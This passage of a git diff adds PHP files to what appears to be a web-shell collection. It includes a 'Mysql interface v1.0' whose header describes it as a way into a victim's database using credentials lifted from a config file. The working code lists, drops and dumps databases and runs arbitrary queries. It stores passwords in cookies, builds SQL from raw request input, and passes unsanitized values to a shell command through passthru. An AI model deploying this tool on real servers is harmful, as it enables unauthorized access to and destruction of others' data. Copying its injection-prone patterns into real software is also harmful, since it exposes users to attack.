+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == 
+"tinytext" 
+) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) 
+echo 
+"checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == 
+"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == 
+"longtext" 
+) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == 
+"tinyblob" 
+) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) 
+echo 
+"checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == 
+"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == 
+"longblob" 
+) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) 
+echo 
+"checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) 
+echo 
+"checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value 
+list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo 
+"value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo 
+"value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? 
+if( 
+strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( 
+strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( 
+strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( 
+$valuelist 
+!= "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto 
+increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
+if( 
+$fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( 
+$fielddefault != 
+"" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment 
+value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo 
+"checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY 
+KEY" 
+<? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, 
+$PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, 
+$auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, 
+$rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a 
+href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add 
+Data</a> | \n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a 
+href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a 
+href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' 
+onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form 
+action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' 
+method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE 
+$key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len 
+name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname 
+value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD 
+$dbname 
+$tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a 
+href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table 
+List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
diff --git a/138shell/M/Mysql interface v1.0.txt b/138shell/M/Mysql interface v1.0.txt
new file mode 100644
index 0000000..28a5e14
--- /dev/null
+++ b/138shell/M/Mysql interface v1.0.txt	
@@ -0,0 +1,1166 @@
+<?
+/*
+* Mysql interface v1.0
+* -------------------------------
+* Description :
+* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+global $PHP_SELF;
+
+setcookie( "mysql_web_admin_username" );
+setcookie( "mysql_web_admin_password" );
+echo "<html>\n";
+echo "<head>\n";
+echo "<title>Mysql interface</title>\n";
+echo "</head>\n";
+echo "<body>\n";
+echo "<table width=100% height=100%><tr><td><center>\n";
+echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n";
+echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=logon_submit>\n";
+echo "<table cellpadding=5 cellspacing=1>\n";
+echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
+echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
+echo "</table><p>\n";
+echo "<input type=submit value='Enter'>\n";
+echo "<input type=reset value='Clear'><br>\n";
+echo "</form>\n";
+echo "</center></td></tr></table>\n";
+echo "</center></td></tr></table>\n";
+echo "<p><hr width=300>\n";
+echo "<font size=2>\n";
+echo "Copyright &copy; 2005\n <br>";
+echo "</font>\n";
+echo "</center></td></tr></table>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+function logon_submit() {
+global $username, $password, $PHP_SELF;
+
+setcookie( "mysql_web_admin_username", $username );
+setcookie( "mysql_web_admin_password", $password );
+echo "<html>";
+echo "<head>";
+echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
+echo "</head>";
+echo "</html>";
+}
+
+function echoQueryResult() {
+global $queryStr, $errMsg;
+
+if( $errMsg == "" ) $errMsg = "Success";
+if( $queryStr != "" ) {
+  echo "<table cellpadding=5>\n";
+  echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+  echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+  echo "</table><p>\n";
+}
+}
+
+function listDatabases() {
+global $mysqlHandle, $PHP_SELF;
+
+echo "<h1>Database List</h1>\n";
+
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createDB>\n";
+echo "<input type=text name=dbname>\n";
+echo "<input type=submit value='Create Database'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+$pDB = mysql_list_dbs( $mysqlHandle );
+$num = mysql_num_rows( $pDB );
+for( $i = 0; $i < $num; $i++ ) {
+  $dbname = mysql_dbname( $pDB, $i );
+  echo "<tr>\n";
+  echo "<td>$dbname</td>\n";
+  echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+  echo "</tr>\n";
+}
+echo "</table>\n";
+}
+
+function createDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_create_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function dropDatabase() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+mysql_drop_db( $dbname, $mysqlHandle );
+listDatabases();
+}
+
+function listTables() {
+global $mysqlHandle, $dbname, $PHP_SELF;
+
+echo "<h1>Table List</h1>\n";
+echo "<p class=location>$dbname</p>\n";
+echoQueryResult();
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=createTable>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text name=tablename>\n";
+echo "<input type=submit value='Create Table'>\n";
+echo "</form>\n";
+echo "<form action='$PHP_SELF'>\n";
+echo "<input type=hidden name=action value=query>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=text size=40 name=queryStr>\n";
+//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+echo "<input type=submit value='Query'>\n";
+echo "</form>\n";
+echo "<hr>\n";
+
+$pTable = mysql_list_tables( $dbname );
+
+if( $pTable == 0 ) {
+  $msg  = mysql_error();
+  echo "<h3>Error : $msg</h3><p>\n";
+  return;
+}
+$num = mysql_num_rows( $pTable );
+
+echo "<table cellspacing=1 cellpadding=5>\n";
+
+for( $i = 0; $i < $num; $i++ ) {
+  $tablename = mysql_tablename( $pTable, $i );
+
+  echo "<tr>\n";
+  echo "<td>\n";
+  echo "$tablename\n";
+  echo "</td>\n";
+  echo "<td>\n";
